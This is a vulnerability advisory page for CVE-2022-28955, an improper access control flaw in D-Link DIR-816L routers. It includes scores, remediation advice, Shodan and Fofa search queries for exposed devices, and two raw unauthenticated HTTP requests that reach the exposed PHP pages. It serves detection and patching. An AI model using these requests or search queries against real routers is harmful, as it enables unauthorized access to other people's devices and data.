🔙 목록으로 돌아가기

CVE-2022-28955: D-Link DIR-816L - Improper Access Control

TitleD-Link DIR-816L - Improper Access Control
Authorarafatansari
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected router.
RemediationApply the latest firmware update provided by D-Link to fix the access control issue.
CVSS Score7.5
EPSS Score0.92711
CVE IDCVE-2022-28955
CWE IDCWE-287
Shodan Queryhttp.html:"DIR-816L"http.html:"dir-816l"
Fofa Querybody="dir-816l"
Tags cve2022 cve dlink exposure vuln

🔍 Vulnerability Description

D-Link DIR-816L_FW206b01 is susceptible to improper access control. An attacker can access folders folder_view.php and category_view.php and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /category_view.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/12.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /folder_view.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28955.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-28955.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A